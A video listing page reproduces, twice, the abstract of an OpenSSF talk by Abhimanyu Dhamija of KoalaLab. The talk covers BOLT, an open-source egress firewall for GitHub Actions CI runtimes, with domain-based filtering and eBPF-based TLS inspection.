Securing CI/CD: Complexity & Inspiration from Runtime Security - Abhimanyu Dhamija, KoalaLab
Securing CI/CD: Complexity & Inspiration from Runtime Security - Abhimanyu Dhamija, KoalaLab
Growth of software supply chain attacks has propelled a deeper look into security of CI/CD. Build environments are prone to secrets/sensitive data exfiltration attacks. Covering here, the learnings around building BOLT(https://github.com/koalalab-inc/bolt), an Open-source tool which secure CI runtime(For GitHub Actions). Taking inspiration from Runtime security, enabling a firewall on buildtime/CI runtime(Egress-filter as CI is a traffic source) should be good start. Complexity 1: IP-based rules won't work. A lot of internet traffic is behind CDNs/WAFs, so egress-filter will require domain-name based filtering. Complexity 2: CI runtime has outbound traffic to multi-tenant systems like github/dockerhub/jfrog etc. This demands deep SSL based inspection capabilities in egress control. Solution: TLS interception+eBPF Linux kernel supports eBPF which provides a way to tap into SSL traffic without the need to decrypt traffic. Such a solution does not add any overhead for developers and is efficient. Covering implementation complexity of eBPF probing for various different kind of SSL libraries to make the solution comprehensive for all kinds of CI pipelines.
Видео Securing CI/CD: Complexity & Inspiration from Runtime Security - Abhimanyu Dhamija, KoalaLab канала OpenSSF
Growth of software supply chain attacks has propelled a deeper look into security of CI/CD. Build environments are prone to secrets/sensitive data exfiltration attacks. Covering here, the learnings around building BOLT(https://github.com/koalalab-inc/bolt), an Open-source tool which secure CI runtime(For GitHub Actions). Taking inspiration from Runtime security, enabling a firewall on buildtime/CI runtime(Egress-filter as CI is a traffic source) should be good start. Complexity 1: IP-based rules won't work. A lot of internet traffic is behind CDNs/WAFs, so egress-filter will require domain-name based filtering. Complexity 2: CI runtime has outbound traffic to multi-tenant systems like github/dockerhub/jfrog etc. This demands deep SSL based inspection capabilities in egress control. Solution: TLS interception+eBPF Linux kernel supports eBPF which provides a way to tap into SSL traffic without the need to decrypt traffic. Such a solution does not add any overhead for developers and is efficient. Covering implementation complexity of eBPF probing for various different kind of SSL libraries to make the solution comprehensive for all kinds of CI pipelines.
Видео Securing CI/CD: Complexity & Inspiration from Runtime Security - Abhimanyu Dhamija, KoalaLab канала OpenSSF
Комментарии отсутствуют
Информация о видео
17 декабря 2024 г. 22:26:19
00:12:16
Другие видео канала